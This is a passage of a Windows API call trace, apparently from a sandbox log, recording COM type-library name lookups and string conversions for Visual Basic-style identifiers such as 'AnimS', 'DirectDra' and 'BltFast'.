ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_FrameC", lHashVal=0x103392, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.516] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.516] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.516] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_FrameC", lHashVal=0x103392, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.516] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.516] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.516] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_FrameC", lHashVal=0x103392, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.516] IUnknown:Release (This=0x782b300) returned 0x6 [0045.516] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.516] IUnknown:Release (This=0x782a220) returned 0x22 [0045.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.516] wcscpy_s (in: _Destination=0xb64bea0, _SizeInWords=0x5, _Source="ount" | out: _Destination="ount") returned 0x0 [0045.516] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimS") returned 0x104c65 [0045.516] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="AnimS" | out: _Dst="AnimS") returned 0x0 [0045.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="AnimS") returned 6 [0045.517] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.517] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="AnimS", lHashVal=0x104c65, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.517] IUnknown:Release (This=0x782a220) returned 0x22 [0045.517] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.517] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="AnimS", lHashVal=0x104c65, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.517] IUnknown:Release (This=0x731da90) returned 0x15 [0045.517] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.517] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="AnimS", lHashVal=0x104c65, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.517] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.517] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.517] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="AnimS", lHashVal=0x104c65, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.517] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.517] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.517] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AnimS") returned 0x101052 [0045.517] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_AnimS" | out: _Dst="_B_var_AnimS") returned 0x0 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_AnimS") returned 13 [0045.517] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.517] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_AnimS", lHashVal=0x101052, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.517] IUnknown:Release (This=0x782a220) returned 0x22 [0045.517] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.517] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_AnimS", lHashVal=0x101052, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.517] IUnknown:Release (This=0x731da90) returned 0x15 [0045.517] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.517] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_AnimS", lHashVal=0x101052, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.517] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.517] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.517] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_AnimS", lHashVal=0x101052, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.517] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.517] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.517] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_AnimS", lHashVal=0x101052, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.517] IUnknown:Release (This=0x782b300) returned 0x6 [0045.517] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.517] IUnknown:Release (This=0x782a220) returned 0x22 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.517] wcscpy_s (in: _Destination=0xb64beb8, _SizeInWords=0x5, _Source="peed" | out: _Destination="peed") returned 0x0 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.518] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimC") returned 0x104c55 [0045.518] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="AnimC" | out: _Dst="AnimC") returned 0x0 [0045.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="AnimC") returned 6 [0045.518] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.518] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="AnimC", lHashVal=0x104c55, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.518] IUnknown:Release (This=0x782a220) returned 0x22 [0045.518] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.518] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="AnimC", lHashVal=0x104c55, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.518] IUnknown:Release (This=0x731da90) returned 0x15 [0045.518] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.518] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="AnimC", lHashVal=0x104c55, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.518] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.518] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.518] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="AnimC", lHashVal=0x104c55, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.518] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.518] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.518] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AnimC") returned 0x101042 [0045.518] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_AnimC" | out: _Dst="_B_var_AnimC") returned 0x0 [0045.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_AnimC") returned 13 [0045.518] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.518] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_AnimC", lHashVal=0x101042, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.518] IUnknown:Release (This=0x782a220) returned 0x22 [0045.518] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.518] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_AnimC", lHashVal=0x101042, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.518] IUnknown:Release (This=0x731da90) returned 0x15 [0045.518] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.518] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_AnimC", lHashVal=0x101042, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.518] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.518] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.518] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_AnimC", lHashVal=0x101042, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.518] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.518] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.518] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_AnimC", lHashVal=0x101042, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.518] IUnknown:Release (This=0x782b300) returned 0x6 [0045.518] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.518] IUnknown:Release (This=0x782a220) returned 0x22 [0045.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.518] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.518] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Speed") returned 0x10c7a6 [0045.518] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.518] IUnknown:Release (This=0x782a220) returned 0x22 [0045.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52f4e, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="peed") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52efe, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="ount") returned 0 [0045.519] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Anim") returned 0x102de7 [0045.519] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x5, _Src="Anim" | out: _Dst="Anim") returned 0x0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=5, lpWideCharStr=0x2e4390, cchWideChar=5 | out: lpWideCharStr="Anim") returned 5 [0045.519] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.519] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Anim", lHashVal=0x102de7, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.519] IUnknown:Release (This=0x782a220) returned 0x22 [0045.519] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.519] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Anim", lHashVal=0x102de7, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.519] IUnknown:Release (This=0x731da90) returned 0x15 [0045.519] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.519] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Anim", lHashVal=0x102de7, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.519] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.519] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.519] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Anim", lHashVal=0x102de7, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.519] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.519] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb494df0 [0045.519] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Anim") returned 0x109353 [0045.519] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xc, _Src="_B_var_Anim" | out: _Dst="_B_var_Anim") returned 0x0 [0045.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=12, lpWideCharStr=0x2e4540, cchWideChar=12 | out: lpWideCharStr="_B_var_Anim") returned 12 [0045.520] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.520] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Anim", lHashVal=0x109353, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.520] IUnknown:Release (This=0x782a220) returned 0x22 [0045.520] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.520] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Anim", lHashVal=0x109353, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.520] IUnknown:Release (This=0x731da90) returned 0x15 [0045.520] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.520] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Anim", lHashVal=0x109353, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.520] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.520] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.520] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Anim", lHashVal=0x109353, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.520] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.520] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.520] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Anim", lHashVal=0x109353, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.520] IUnknown:Release (This=0x782b300) returned 0x6 [0045.520] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.520] IUnknown:Release (This=0x782a220) returned 0x22 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52fc6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="FY") returned 0 [0045.520] wcscpy_s (in: _Destination=0xb64bed0, _SizeInWords=0x3, _Source="FY" | out: _Destination="FY") returned 0x0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4400, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4400, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e4400, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52fea, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="FX") returned 0 [0045.520] wcscpy_s (in: _Destination=0xb64bee0, _SizeInWords=0x3, _Source="FX" | out: _Destination="FX") returned 0x0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60072, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="FS") returned 0 [0045.520] wcscpy_s (in: _Destination=0xb64bef0, _SizeInWords=0x3, _Source="FS" | out: _Destination="FS") returned 0x0 [0045.520] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDra") returned 0x100c86 [0045.520] strcpy_s (in: _Dst=0x2e4540, _DstSize=0xa, _Src="DirectDra" | out: _Dst="DirectDra") returned 0x0 [0045.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=10, lpWideCharStr=0x2e4390, cchWideChar=10 | out: lpWideCharStr="DirectDra") returned 10 [0045.520] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.520] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DirectDra", lHashVal=0x100c86, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x782a220) returned 0x22 [0045.521] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.521] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DirectDra", lHashVal=0x100c86, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x731da90) returned 0x15 [0045.521] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.521] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DirectDra", lHashVal=0x100c86, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.521] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.521] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DirectDra", lHashVal=0x100c86, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.521] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.521] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494df0 [0045.521] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DirectDra") returned 0x1015cb [0045.521] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0x11, _Src="_B_var_DirectDra" | out: _Dst="_B_var_DirectDra") returned 0x0 [0045.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=17, lpWideCharStr=0x2e4540, cchWideChar=17 | out: lpWideCharStr="_B_var_DirectDra") returned 17 [0045.521] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.521] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DirectDra", lHashVal=0x1015cb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.521] IUnknown:Release (This=0x782a220) returned 0x22 [0045.521] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.521] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DirectDra", lHashVal=0x1015cb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.521] IUnknown:Release (This=0x731da90) returned 0x15 [0045.521] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.521] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DirectDra", lHashVal=0x1015cb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.521] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.521] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.521] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DirectDra", lHashVal=0x1015cb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.521] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.521] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.521] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DirectDra", lHashVal=0x1015cb, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.521] IUnknown:Release (This=0x782b300) returned 0x6 [0045.521] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.521] IUnknown:Release (This=0x782a220) returned 0x22 [0045.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6004a, cbMultiByte=9, lpWideCharStr=0x2e4400, cchWideChar=8 | out: lpWideCharStr="w_Anims") returned 0 [0045.521] wcscpy_s (in: _Destination=0xb64bf00, _SizeInWords=0x8, _Source="w_Anims" | out: _Destination="w_Anims") returned 0x0 [0045.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a520ce, cbMultiByte=9, lpWideCharStr=0x2e4400, cchWideChar=8 | out: lpWideCharStr="BltFast") returned 0 [0045.521] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="summer") returned 0x10da04 [0045.521] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x7, _Src="summer" | out: _Dst="summer") returned 0x0 [0045.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=7, lpWideCharStr=0x2e4390, cchWideChar=7 | out: lpWideCharStr="summer") returned 7 [0045.521] IUnknown:AddRef (This=0x782a220) returned 